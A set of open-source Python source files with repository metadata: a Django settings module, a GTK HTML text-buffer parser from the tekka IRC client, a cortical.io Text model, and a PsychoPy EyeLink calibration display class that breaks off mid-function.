LOCALE_PATHS = (ABS_PATH('../locale'), )
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'Europe/Stockholm'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'sv_SE'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# If you set this to False, Django will treat all time values as local to
# the specified timezone.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ABS_PATH('media')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = '/media/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ABS_PATH('static')
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# URL prefix for admin static files -- CSS, JavaScript and images.
# Make sure to use a trailing slash.
# Examples: "http://foo.com/static/admin/", "/static/admin/".
ADMIN_MEDIA_PREFIX = '/static/admin/'
# Additional locations of static files
STATICFILES_DIRS = (
ABS_PATH('staticfiles'),
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
def ensure_secret_key_file():
    """Checks that secret.py exists in settings dir. If not, creates one
    with a random generated SECRET_KEY setting."""
    secret_path = os.path.join(ABS_PATH('settings'), 'secret.py')
    if os.path.exists(secret_path):
        return

    # Generate the key lazily so Django is only needed on first run.
    from django.utils.crypto import get_random_string
    alphabet = 'abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*(-_=+)'
    new_key = get_random_string(50, alphabet)
    with open(secret_path, 'w') as f:
        f.write("SECRET_KEY = " + repr(new_key) + "\n")
# Import the secret key
ensure_secret_key_file()
from secret import SECRET_KEY # noqa
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
ABS_PATH('templates'),
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
"django.contrib.auth.context_processors.auth",
"django.template.context_processors.debug",
"django.template.context_processors.i18n",
"django.template.context_processors.media",
"django.template.context_processors.static",
"django.template.context_processors.tz",
"django.contrib.messages.context_processors.messages",
'django.template.context_processors.request',
"comments.context_processors.base_url"
],
'debug': (ENV_SETTING('TEMPLATE_DEBUG', 'true') == 'true'),
},
},
]
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = PROJECT_NAME + '.urls'
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
#'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
'c4all.apps.C4allCommentsConfig',
'c4all.apps.C4allAdminConfig',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
},
'require_debug_true': {
'()': 'django.utils.log.RequireDebugTrue'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
},
'console': {
'level': 'DEBUG',
'filters': ['require_debug_true'],
'class': 'logging.StreamHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
AUTH_USER_MODEL = "c4all_comments.CustomUser"
LOGIN_URL = "/admin/"
BASE_URL = ""
BASE_STATIC = BASE_URL + STATIC_URL
AVATAR_NUM_MIN = 1
AVATAR_NUM_MAX = 28
# regex for getting domain from url, includes port number
DOMAIN_URL_PATTERN = "(https?:\/\/)?([a-z0-9_.-]+\.[a-z0-9]{2,5}(:\d+)?)"
# pagination settings
PER_PAGE = 20
TITLE_SELECTOR = '#c4all-admin-page-title'
# spellchecking ability (disabled by default)
SPELLCHECK_ENABLED = False
# default number of comments
WIDGET_COMMENTS_DEFAULT_NUMBER = 10
| {
"content_hash": "039813fab6b4ec00e2a0b6bb4beb11a8",
"timestamp": "",
"source": "github",
"line_count": 218,
"max_line_length": 79,
"avg_line_length": 30.720183486238533,
"alnum_prop": 0.657010601761983,
"repo_name": "c4all/c4all",
"id": "1f79ca259dd00bcac84f8ea0728c823393cc14ba",
"size": "6716",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "c4all/settings/base.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "122567"
},
{
"name": "HTML",
"bytes": "66965"
},
{
"name": "JavaScript",
"bytes": "108371"
},
{
"name": "Makefile",
"bytes": "1738"
},
{
"name": "Python",
"bytes": "208817"
}
],
"symlink_target": ""
} |
"""
Copyright (c) 2008 Marian Tietz
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE AUTHORS AND CONTRIBUTORS ``AS IS'' AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
SUCH DAMAGE.
"""
import gtk
import pango
import logging
import xml.sax
import xml.sax.handler
from StringIO import StringIO
from .. import gui
from ..helper.url import URLToTag
from .. import helper
from .. import config
class HTMLHandler(xml.sax.handler.ContentHandler):
	"""
	Parses HTML like strings and applies
	the tags as format rules for the given text buffer.

	Tag state (open elements, their gtk tags, and the su/sb toggle
	counters) lives on the instance and is reset after every document,
	so one handler instance can parse many messages in sequence.
	"""

	def __init__(self, textbuffer, handler):
		# textbuffer: the gtk.TextBuffer that receives the parsed text
		# handler: callable connected to "event" on <a> tags (may be None)
		xml.sax.handler.ContentHandler.__init__(self)

		self.textbuffer = textbuffer
		# end tags that need no matching cleanup in endElement
		self.ignoreableEndTags = ["msg","br","su","sb"]
		# elements whose gtk tags must never be cached/reused
		self.no_cache = ["a","sb","su"]
		self.URLHandler = handler

		self._reset_values()

	def _reset_values(self):
		# Reset per-document parse state: open element names, their gtk
		# tags, and the toggle counters for <su>/<sb>.
		self.elms = []
		self.tags = []
		self.sucount = 0
		self.sbcount = 0

	def _get_cache_name(self, name, attrs):
		" return the caching name of a element for tag caching "
		def attrs_to_dict(attrs):
			# serialize the attribute list so differently-styled
			# font/span elements get distinct cache keys
			return "{"+ ",".join(
				[n+":"+attrs.getValue(n) for n in attrs.getNames()]) +"}"
		if name in ("font","span"):
			return name + attrs_to_dict(attrs)
		return name

	def _get_cached(self, cachename):
		" return the cached tag for the given element or None "
		# NOTE(review): this helper is not referenced anywhere in this
		# class; startElement does the lookup inline -- confirm it is
		# still needed.
		return self.textbuffer.get_tag_table().lookup(cachename)

	def _apply_tag(self, name, tag):
		""" mark the element and the tag to be added later.
			This is usually called in startElement.
		"""
		self.elms.insert(0, name)
		self.tags.insert(0, tag)

	def characters(self, text):
		""" Raw characters? Apply them (with tags, if given)
			to the text buffer
		"""
		if len(self.tags):
			# there are tags, apply them to the text
			self.textbuffer.insert_with_tags(
				self.textbuffer.get_end_iter(),
				text,
				*self.tags)
		else:
			# no tags, just add the text
			self.textbuffer.insert(
				self.textbuffer.get_end_iter(),
				text)

	def startDocument(self):
		pass

	def startElement(self, name, attrs):
		# Reuse a cached gtk tag where possible; <a>/<su>/<sb> are
		# stateful (URL callback, toggle parity) and are never cached.
		if not name in self.no_cache:
			cname = self._get_cache_name(name,attrs)
			tag = self.textbuffer.get_tag_table().lookup(cname)

			if tag: # found a already known tag, use it
				self._apply_tag(name, tag)
				return

		# handle no tag creating elements
		if name == "br":
			self.textbuffer.insert(self.textbuffer.get_end_iter(),"\n")
			return

		# create a new tag: anonymous for uncacheable elements,
		# named (= cached in the tag table) otherwise
		if name in self.no_cache:
			tag = self.textbuffer.create_tag(None)
		else:
			tag = self.textbuffer.create_tag(
				self._get_cache_name(name, attrs))

		tag.s_attribute = {} # special attribute for identifying
		tag.s_attribute[name] = True

		if name == "b":
			tag.set_property("weight", pango.WEIGHT_BOLD)

		elif name == "i":
			tag.set_property("style", pango.STYLE_ITALIC)

		elif name == "u":
			tag.set_property("underline", pango.UNDERLINE_SINGLE)

		elif name == "a":
			# links are underlined and routed to the URL handler
			if self.URLHandler:
				tag.set_property("underline", pango.UNDERLINE_SINGLE)
				tag.connect("event", self.URLHandler, attrs["href"])
				tag.s_attribute["a.href"] = attrs["href"]

		elif name == "su":
			# <su> toggles underline on every odd occurrence
			self.sucount += 1
			if self.sucount % 2 != 0:
				tag.set_property("underline", pango.UNDERLINE_SINGLE)
			else:
				tag.set_property("underline", pango.UNDERLINE_NONE)

		elif name == "sb":
			# <sb> toggles bold on every odd occurrence
			self.sbcount += 1
			if self.sbcount % 2 != 0:
				tag.set_property("weight", pango.WEIGHT_BOLD)
			else:
				tag.set_property("weight", pango.WEIGHT_NORMAL)

		elif name in ("font","span"):
			self._parseFont(tag, attrs)

		elif name == "msg":
			# start tag to avoid errors due to
			# missing overall-tag
			#
			self._parseFont(tag, attrs)

		self._apply_tag(name, tag)

	def endElement(self, name):
		# Pop the first matching open element and its tag; end tags in
		# ignoreableEndTags never pushed anything, so skip them.
		if name in self.ignoreableEndTags:
			return

		try:
			i = self.elms.index(name)
		except ValueError:
			pass
		else:
			del self.elms[i]
			del self.tags[i]

	def endDocument(self):
		""" Close all special bold/underline tags. """
		# If an odd number of <su>/<sb> toggles was seen, append an empty
		# run with the neutral properties so the toggle does not leak
		# into the next document.
		if self.sbcount % 2 != 0 or self.sucount % 2 != 0:
			tag = self.textbuffer.create_tag(None)
			if self.sbcount % 2 != 0:
				tag.set_property("weight", pango.WEIGHT_NORMAL)
			if self.sucount % 2 != 0:
				tag.set_property("underline", pango.UNDERLINE_NONE)
			self.textbuffer.insert_with_tags(
				self.textbuffer.get_end_iter(),
				"",
				tag)
		self._reset_values()

	""" PARSING HELPER """

	def _parseFont(self, tag, attrs):
		# Translate font/span attributes into gtk tag properties.
		# weight/style accept symbolic values; anything else is passed
		# straight through to set_property (errors are only logged).
		if not attrs or attrs.getLength() == 0:
			return

		for name in attrs.getNames():
			if name == "weight":
				if attrs[name] == "bold":
					tag.set_property("weight", pango.WEIGHT_BOLD)
				elif attrs[name] == "normal":
					tag.set_property("weight", pango.WEIGHT_NORMAL)
			elif name == "style":
				if attrs[name] == "italic":
					tag.set_property("style", pango.STYLE_ITALIC)
				elif attrs[name] == "normal":
					tag.set_property("style", pango.STYLE_NORMAL)
			else:
				try:
					tag.set_property(name, attrs[name])
				except Exception as ex:
					logging.error("_parseFont: %s" % (ex))
class ScanHandler(xml.sax.ContentHandler):
	"""No-op SAX handler used only to pre-scan markup for well-formedness.

	HTMLBuffer.insert_html runs input through a parser with this handler
	first, so parse errors (and faulty characters) are caught before the
	text reaches the real, buffer-mutating HTMLHandler.
	"""

	def __init__(self):
		xml.sax.ContentHandler.__init__(self)
class HTMLBuffer(gtk.TextBuffer):
__gtype_name__ = "HTMLBuffer"
global_tagtable = gtk.TextTagTable()
def __init__(self, handler=None, tagtable=None):
self.lines = 0
self.group_string = None
self.group_color = False
if tagtable:
self.tagtable = tagtable
else:
self.tagtable = self.global_tagtable
self.URLHandler = handler
gtk.TextBuffer.__init__(self, self.tagtable)
self.scanner = xml.sax.make_parser()
self.parser = xml.sax.make_parser()
self.scanner.setContentHandler(ScanHandler())
contentHandler = HTMLHandler(self, self.URLHandler)
self.parser.setContentHandler(contentHandler)
def setURLHandler(self, handler):
self.URLHandler = handler
self.parser.getContentHandler().URLHandler = handler
def getURLHandler(self):
return self.URLHandler
def clear(self):
""" Clears the output and resets the tag
table to zero to save memory.
"""
self.set_text("")
# clear the tagtable
tt = self.get_tag_table()
if tt:
tt.foreach(lambda tag,data: data.remove(tag), tt)
def insert(self, iter, text, *x):
" make the buffer a ring buffer with a limit of max_output_lines "
siter = self.get_selection_bounds()
if siter:
soff = siter[0].get_offset()
ioff = siter[1].get_offset()
gtk.TextBuffer.insert(self, iter, text, *x)
self.lines += text.count("\n")
try:
max_lines = int(config.get("tekka",
"max_output_lines"))
except ValueError:
max_lines = int(config.get_default("tekka",
"max_output_lines"))
diff = self.lines - max_lines
if diff > 0:
a = self.get_iter_at_line(0)
b = self.get_iter_at_line(diff)
self.delete(a,b)
self.lines -= diff
if siter:
self.select_range(
self.get_iter_at_offset(soff),
self.get_iter_at_offset(ioff)
)
# FIXME new selection range is off by some bytes
def insert_html(self, iter, text, group_string=None):
""" parse text for HTML markups before adding
it to the buffer at the given iter.
This method is deprecated. Use insert_html.
"""
startoffset = iter.get_offset()
if gtk.TextBuffer.get_char_count(self) > 0:
text = "<br/>" + text
text = URLToTag(text)
if self.group_string != group_string:
self.group_string = group_string
self.group_color = not self.group_color
# color the lines, group coloring by some string
if (config.get_bool("tekka","text_rules")
and self.group_color
and self.group_string):
color = helper.color.get_color_by_key("rules_color").to_string()
text = "<msg paragraph-background='%s'>%s</msg>" % (
color, text)
else:
text = "<msg>%s</msg>" % text
def applyToParser(text):
try:
self.parser.parse(StringIO(text))
except xml.sax.SAXParseException,e:
raise Exception,\
"%s.applyToParser: '%s' raised with '%s'." % (e, text)
while True:
try:
self.scanner.parse(StringIO(text))
except xml.sax.SAXParseException, e:
# Exception while parsing, get (if caused by char)
# the character and delete it. Then try again to
# add the text.
# If the exception is caused by a syntax error,
# abort parsing and print the error with line
# and position.
pos = e.getColumnNumber()
line = e.getLineNumber()
if (pos-2 >= 0 and text[pos-2:pos] == "</"):
logging.error("Syntax error on line %d, "\
"column %d: %s\n\t%s" % (
line,
pos,
text[pos:],
text))
return
logging.error("HTMLBuffer: faulty char on line %d "
"char %d ('%s')" % (line, pos, text[pos]))
# skip the faulty char
text = text[:pos] + text[pos+1:]
continue
else:
# everything went fine, no need
# for looping further.
applyToParser(text)
break
| {
"content_hash": "a646b3f239eacb254f46d9a9a82bd21f",
"timestamp": "",
"source": "github",
"line_count": 397,
"max_line_length": 74,
"avg_line_length": 24.869017632241814,
"alnum_prop": 0.6709206927985415,
"repo_name": "sushi-irc/tekka",
"id": "e7b94f9609f1de3df18923c4a13677cf2cdf3dab",
"size": "9889",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tekka/lib/htmlbuffer.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "483168"
}
],
"symlink_target": ""
} |
#!/usr/bin/env python
"""
"""
from cortical.models.fingerprint import Fingerprint
class Text(object):
    """A piece of text together with its semantic fingerprint."""

    def __init__(self, text=None, fingerprint=None):
        # The raw text content as a string.
        self.text = text
        # The semantic fingerprint of the text. A plain dict (as returned
        # by the API) is promoted to a Fingerprint instance; anything else
        # is stored untouched.
        if isinstance(fingerprint, dict):
            self.fingerprint = Fingerprint(**fingerprint)
        else:
            self.fingerprint = fingerprint
| {
"content_hash": "8c852cebd202b8c92f6d2a423c25e331",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 117,
"avg_line_length": 31.307692307692307,
"alnum_prop": 0.6781326781326781,
"repo_name": "cortical-io/python-client-sdk",
"id": "511cfc96ba83f8fa2cc5298b69b91f8c63abd90e",
"size": "813",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "cortical/models/text.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "58412"
}
],
"symlink_target": ""
} |
from psychopy import visual, monitors, event, core, sound
from numpy import linspace
from math import sin, cos, pi
from PIL import Image
import array, string, pylink, psychopy, pygaze
from pygaze import settings
from pygaze.screen import Screen
class EyeLinkCoreGraphicsPsychoPy(pylink.EyeLinkCustomDisplay):
    """PyLink calibration graphics rendered through a PsychoPy window.

    Implements the EyeLinkCustomDisplay callbacks (calibration targets,
    camera image, key/mouse input, beeps) on top of PsychoPy, converting
    between the tracker's pixel coordinates and the window's screen units
    via the cfX/cfY scale factors computed in __init__.
    """

    def __init__(self, libeyelink, win, tracker):
        """Initialize a Custom EyeLinkCoreGraphics
        tracker: an eye-tracker instance
        win: the Psychopy display we plan to use for stimulus presentation """
        pylink.EyeLinkCustomDisplay.__init__(self)
        self.tracker = tracker
        self.display = win
        self.libeyelink = libeyelink
        # win = self.display
        # Let's disable the beeps as the Psychopy "sound" module will bite our ass
        #self.__target_beep__ = sound.Sound('type.wav')
        #self.__target_beep__done__ = sound.Sound('qbeep.wav')
        #self.__target_beep__error__ = sound.Sound('error.wav')
        # NOTE(review): the beep attributes above are commented out, yet
        # play_beep() still references them when settings.EYELINKCALBEEP is
        # on -- that path would raise AttributeError; confirm intended.
        self.imgBuffInitType = 'I'
        self.imagebuffer = array.array(self.imgBuffInitType)
        self.pal = None
        # default camera-image size in pixels (newer API: 384 x 320)
        self.size = (384,320)
        self.bg_color = win.color
        self.sizeX = win.size[0]
        self.sizeY = win.size[1]
        # check the screen units of Psychopy and make all necessary conversions for the drawing functions
        self.units = win.units
        self.monWidthCm = win.monitor.getWidth()
        self.monViewDist = win.monitor.getDistance()
        self.monSizePix = win.monitor.getSizePix()
        # a scaling factor to make the screen units right for Psychopy
        self.cfX = 1.0
        self.cfY = 1.0
        if self.units == 'pix':
            pass
        elif self.units == 'height':
            self.cfX = 1.0/self.monSizePix[1]
            self.cfY = 1.0/self.monSizePix[1]
        elif self.units == 'norm':
            self.cfX = 2.0/self.monSizePix[0]
            self.cfY = 2.0/self.monSizePix[1]
        elif self.units == 'cm':
            self.cfX = self.monWidthCm*1.0/self.monSizePix[0]
            self.cfY = self.cfX
        else: # here comes the 'deg*' units
            self.cfX = self.monWidthCm/self.monViewDist/pi*180.0/self.monSizePix[0]
            self.cfY = self.cfX
        # initial setup for the mouse
        self.display.mouseVisible = False
        self.mouse = event.Mouse(visible=False)
        self.mouse.setPos([0,0]) # make the mouse appear at the center of the camera image
        self.last_mouse_state = -1
        # image title
        self.msgHeight = self.size[1]/20.0*self.cfY
        self.title = visual.TextStim(self.display,'', height=self.msgHeight, color=[1,1,1])
        # lines
        self.line = visual.Line(self.display, start=(0, 0), end=(0,0),
                    lineWidth=2.0*self.cfX, lineColor=[0,0,0])
        # Stolen from PyGaze
        self.esc_pressed = None
        self.display_open = True
        self.xc = 0
        self.yc = 0
        self.extra_info = True
        self.ld = 40 # line distance
        self.fontsize = libeyelink.fontsize
        # NOTE(review): self.state is read by play_beep() but is only ever
        # assigned inside get_input_key(); it is not initialized here --
        # verify play_beep cannot run before a c/v/q key was seen.
        self.draw_menu_screen()

    def draw_menu_screen(self):
        """ Draws menu screen """
        # Pre-build all TextStim objects of the setup menu; they are drawn
        # later by setup_cal_display().
        title = visual.TextStim(win=self.display, text="Eyelink calibration menu",
                                pos=(self.xc, self.yc + 6 * self.ld), font='mono',
                                height=int(2 * self.fontsize), antialias=True, color='black')
        vers = visual.TextStim(win=self.display, text="%s (pygaze %s, pylink %s)" \
                               % (self.libeyelink.eyelink_model, pygaze.version,
                                  pylink.__version__),
                               pos=(self.xc, self.yc + 5 * self.ld),
                               font='mono', height=int(.8 * self.fontsize), antialias=True,
                               color='black')
        cal = visual.TextStim(win=self.display, text="Press C to calibrate",
                              pos=(self.xc, self.yc + 3 * self.ld), font='mono',
                              height=self.fontsize, antialias=True, color='black')
        val = visual.TextStim(win=self.display, text="Press V to validate",
                              pos=(self.xc, self.yc + 2 * self.ld), font='mono',
                              height=self.fontsize, antialias=True, color='black')
        autothres = visual.TextStim(win=self.display, text="Press A to auto-threshold",
                                    pos=(self.xc, self.yc + 1 * self.ld), font='mono',
                                    height=self.fontsize, antialias=True, color='black')
        extra_info = visual.TextStim(win=self.display, text="Press I to toggle extra info in camera image",
                                     pos=(self.xc, self.yc - 0 * self.ld), font='mono',
                                     height=self.fontsize, antialias=True, color='black')
        cam = visual.TextStim(win=self.display, text="Press Enter to show camera image",
                              pos=(self.xc, self.yc - 1 * self.ld), font='mono',
                              height=self.fontsize, antialias=True, color='black')
        arrow_keys = visual.TextStim(win=self.display, text="(then change between images using the arrow keys)",
                                     pos=(self.xc, self.yc - 2 * self.ld), font='mono',
                                     height=self.fontsize, antialias=True, color='black')
        abort = visual.TextStim(win=self.display, text="Press Escape to abort experiment",
                                pos=(self.xc, self.yc - 4 * self.ld), font='mono',
                                height=self.fontsize, antialias=True, color='black')
        exit = visual.TextStim(win=self.display, text="Press Q to exit menu",
                               pos=(self.xc, self.yc - 5 * self.ld), font='mono',
                               height=self.fontsize, antialias=True, color='black')
        self.menuscreen = [title, vers, cal, val, autothres, extra_info, cam, arrow_keys, abort, exit]

    def close(self):
        # Mark the display as closed; get_input_key() checks this flag.
        self.display_open = False

    def setTracker(self, tracker):
        """ set proper tracker parameters """
        self.tracker = tracker
        self.tracker_version = tracker.getTrackerVersion()
        if self.tracker_version >=3:
            self.tracker.sendCommand("enable_search_limits=YES")
            self.tracker.sendCommand("track_search_limits=YES")
            self.tracker.sendCommand("autothreshold_click=YES")
            self.tracker.sendCommand("autothreshold_repeat=YES")
            self.tracker.sendCommand("enable_camera_position_detect=YES")

    def setup_cal_display(self):
        """Set up the calibration display before entering the calibration/validation routine"""
        self.display.color = self.bg_color
        self.title.autoDraw = False
        for menu_screen_item in self.menuscreen:
            menu_screen_item.draw()
        self.display.flip()
        # show instructions
        # self.libeyelink.display.fill(self.menuscreen)
        # self.libeyelink.display.show()

    def clear_cal_display(self):
        """Clear the calibration display"""
        for menu_screen_item in self.menuscreen:
            menu_screen_item.setAutoDraw(False)
        self.display.color = self.bg_color

    def exit_cal_display(self):
        """Exit the calibration/validation routine"""
        self.clear_cal_display()

    def record_abort_hide(self):
        """This function is called if aborted"""
        pass

    def erase_cal_target(self):
        """Erase the calibration/validation & drift-check target"""
        self.display.color = self.bg_color
        self.display.flip()

    def draw_cal_target(self, x, y):
        """Draw the calibration/validation & drift-check target.

        x/y arrive in tracker pixel coordinates (origin top-left); they are
        converted to the window's centered unit system via cfX/cfY.
        """
        xVis = (x - self.sizeX/2)*self.cfX
        yVis = (self.sizeY/2 - y)*self.cfY
        cal_target_out = visual.GratingStim(self.display, tex='none', mask='circle', size=2.0/100*self.sizeX*self.cfX, color=[1.0,1.0,1.0])
        cal_target_in = visual.GratingStim(self.display, tex='none', mask='circle', size=2.0/300*self.sizeX*self.cfX, color=[-1.0,-1.0,-1.0])
        cal_target_out.setPos((xVis, yVis))
        cal_target_in.setPos((xVis, yVis))
        cal_target_out.draw()
        cal_target_in.draw()
        self.display.flip()

    def play_beep(self, beepid):
        """ Play a sound during calibration/drift correct.
        SM: this method was taken from PyGaze's method and adjusted to use PsychoPy windows
        """
        # pass
        # we need to disable the beeps to make this library work on all platforms
        #if beepid == pylink.CAL_TARG_BEEP or beepid == pylink.DC_TARG_BEEP:
        #    self.__target_beep__.play()
        #if beepid == pylink.CAL_ERR_BEEP or beepid == pylink.DC_ERR_BEEP:
        #    self.__target_beep__error__.play()
        #if beepid in [pylink.CAL_GOOD_BEEP, pylink.DC_GOOD_BEEP]:
        #    self.__target_beep__done__.play()
        if beepid == pylink.CAL_TARG_BEEP:
            # For some reason, playing the beep here doesn't work, so we have
            # to play it when the calibration target is drawn.
            if settings.EYELINKCALBEEP:
                self.__target_beep__.play()
        elif beepid == pylink.CAL_ERR_BEEP or beepid == pylink.DC_ERR_BEEP:
            # Calibration lost
            cal_lost = visual.TextStim(self.display, text="Calibration lost, press 'enter' to return to menu",
                                       pos=(self.xc, self.yc), font='mono', height=self.fontsize, antialias=True)
            cal_lost.draw()
            self.display.flip()
            # play beep
            if settings.EYELINKCALBEEP:
                self.__target_beep__error__.play()
        elif beepid == pylink.CAL_GOOD_BEEP:
            # NOTE(review): self.state is set in get_input_key(); if no
            # c/v/q key was pressed yet this attribute may not exist.
            if self.state == "calibration":
                # Calibration was a success
                cal_succ = visual.TextStim(self.display, text="Calibration succesful, press 'v' to validate",
                                           pos=(self.xc, self.yc), font='mono', height=self.fontsize, antialias=True)
                cal_succ.draw()
            elif self.state == "validation":
                # validation was successful
                val_succ = visual.TextStim(self.display, text="Validation succesful, press 'enter' to return to menu",
                                           pos=(self.xc, self.yc), font='mono', height=self.fontsize, antialias=True)
                val_succ.draw()
            else:
                # Cal + val done, return to menu
                ret = visual.TextStim(self.display, text="Press 'enter' to return to menu",
                                      pos=(self.xc, self.yc), font='mono', height=self.fontsize, antialias=True)
                ret.draw()
            # Flip display
            self.display.flip()
            # play beep
            if settings.EYELINKCALBEEP:
                self.__target_beep__done__.play()
        else: # DC_GOOD_BEEP or DC_TARG_BEEP
            pass

    def getColorFromIndex(self, colorindex):
        """Return psychopy colors for elements in the camera image"""
        if colorindex == pylink.CR_HAIR_COLOR: return (1, 1, 1)
        elif colorindex == pylink.PUPIL_HAIR_COLOR: return (1, 1, 1)
        elif colorindex == pylink.PUPIL_BOX_COLOR: return (-1, 1, -1)
        elif colorindex == pylink.SEARCH_LIMIT_BOX_COLOR: return (1, -1, -1)
        elif colorindex == pylink.MOUSE_CURSOR_COLOR: return (1, -1, -1)
        else: return (0,0,0)

    def draw_line(self, x1, y1, x2, y2, colorindex):
        """Draw a line. This is used for drawing crosshairs/squares"""
        # convert camera-image pixel coordinates (origin top-left) to the
        # window's centered coordinate system
        y1 = (y1 * -1 + self.size[1]/2)*self.cfY
        x1 = (x1 * 1 - self.size[0]/2)*self.cfX
        y2 = (y2 * -1 + self.size[1]/2)*self.cfY
        x2 = (x2 * 1 - self.size[0]/2)*self.cfX
        color = self.getColorFromIndex(colorindex)
        self.line.start = (x1, y1)
        self.line.end = (x2, y2)
        self.line.lineColor = color
        self.line.draw()

    def draw_lozenge(self, x, y, width, height, colorindex):
        """ draw a lozenge to show the defined search limits"""
        # a lozenge = two parallel lines capped by two semicircles; which
        # sides get the caps depends on the aspect ratio
        y = (y * -1 + self.size[1] - self.size[1]/2)*self.cfY
        x = (x * 1 - self.size[0]/2)*self.cfX
        width = width*self.cfX; height = height*self.cfY
        color = self.getColorFromIndex(colorindex)
        if width > height:
            rad = height / 2
            if rad == 0:
                return #cannot draw the circle with 0 radius
            #draw the lines
            line1 = visual.Line(self.display, lineColor=color, lineWidth=2.0*self.cfX, start=(x + rad, y), end=(x + width - rad, y))
            line2 = visual.Line(self.display, lineColor=color, lineWidth=2.0*self.cfX, start=(x + rad, y - height), end=(x + width - rad, y - height))
            #draw semicircles
            Xs1 = [rad*cos(t) + x + rad for t in linspace(pi/2, pi/2+pi, 72)]
            Ys1 = [rad*sin(t) + y - rad for t in linspace(pi/2, pi/2+pi, 72)]
            Xs2 = [rad*cos(t) + x - rad + width for t in linspace(pi/2+pi, pi/2+2*pi, 72)]
            Ys2 = [rad*sin(t) + y - rad for t in linspace(pi/2+pi, pi/2+2*pi, 72)]
            lozenge1 = visual.ShapeStim(self.display, vertices = zip(Xs1, Ys1), lineWidth=2.0*self.cfX, lineColor=color, closeShape=False)
            lozenge2 = visual.ShapeStim(self.display, vertices = zip(Xs2, Ys2), lineWidth=2.0*self.cfX, lineColor=color, closeShape=False)
        else:
            rad = width / 2
            #draw the lines
            line1 = visual.Line(self.display, lineColor=color, lineWidth=2.0*self.cfX, start=(x, y - rad), end=(x, y - height + rad))
            line2 = visual.Line(self.display, lineColor=color, lineWidth=2.0*self.cfX, start=(x + width, y - rad), end=(x + width, y - height + rad))
            #draw semicircles
            if rad == 0:
                return #cannot draw sthe circle with 0 radius
            Xs1 = [rad*cos(t) + x + rad for t in linspace(0, pi, 72)]
            Ys1 = [rad*sin(t) + y - rad for t in linspace(0, pi, 72)]
            Xs2 = [rad*cos(t) + x + rad for t in linspace(pi, 2*pi, 72)]
            Ys2 = [rad*sin(t) + y + rad - height for t in linspace(pi, 2*pi, 72)]
